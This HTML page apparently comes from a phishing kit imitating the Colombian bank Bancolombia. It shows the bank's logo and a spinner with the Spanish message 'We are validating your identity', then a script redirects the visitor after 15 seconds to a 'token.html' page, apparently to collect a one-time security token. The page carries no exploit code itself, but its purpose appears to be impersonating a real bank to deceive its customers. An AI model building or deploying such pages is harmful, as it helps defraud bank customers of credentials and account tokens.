<html style="--app-height:724px;">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=10">
   <title>Cargando</title>
   <link rel="icon" href="./datos/favicon.ico" type="image/x-icon">
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
   <meta name="viewport" content="width=device-width, initial-scale=1">

   <style type="text/css">
      body{
         font-family: Arial, Helvetica, sans-serif;
      }
      /* Chart.js */
      @keyframes chartjs-render-animation {
         from { opacity: 0.99; }
         to { opacity: 1; }
      }

      .chartjs-render-monitor {
         animation: chartjs-render-animation 0.001s;
      }

      /* Dot Loader */
      .loader {
         margin: auto;
         width: 50px;
         aspect-ratio: 1;
         border-radius: 50%;
         background: 
            radial-gradient(farthest-side, red 94%, #0000) top/8px 8px no-repeat,
            conic-gradient(#0000 30%, red);
         -webkit-mask: radial-gradient(farthest-side, #0000 calc(100% - 8px), #000 0);
         animation: l13 1s infinite linear;
      }

      @keyframes l13 {
         100% { transform: rotate(1turn); }
      }
   </style>

</head>

<body>
   <center><img class="logo_mobile" src="./datos/logo.png" alt="Bancolombia" width="300px"></center>

   <div id="hh">
      <section id="funnel-de-ingreso">
         <div class="container">
            <div style="background-color: #ffffff; width: 100%;">
               <br>
               <!-- Reemplaza el GIF con el nuevo loader -->
               <div style="text-align: center;">
                  <div class="loader"></div>
               </div>
               <br> <br>
               <div style="text-align: center;">
                  Estamos Validando Tu Identidad. <br> 
                  <strong id="time"><br><label id="countdown">0:15</label></strong>
               </div>
            </div>
         </div>
      </section>

      <script type="text/javascript">
         var url = "token.html";
         var seconds = 15; //número de segundos a contar
         function secondPassed() {
            var minutes = Math.round((seconds - 30) / 60); //calcula el número de minutos
            var remainingSeconds = seconds % 60; //calcula los segundos
            //si los segundos usan sólo un dígito, añadimos un cero a la izquierda
            if (remainingSeconds < 10) {
               remainingSeconds = "0" + remainingSeconds;
            }
            document.getElementById('countdown').innerHTML = minutes + ":" + remainingSeconds;
            if (seconds == 0) {
               clearInterval(countdownTimer);
               window.location = url;
               document.getElementById('countdown').innerHTML = "";
            } else {
               seconds--;
            }
         }

         var countdownTimer = setInterval(secondPassed, 1000);
      </script>
   </div>
</body>
</html>
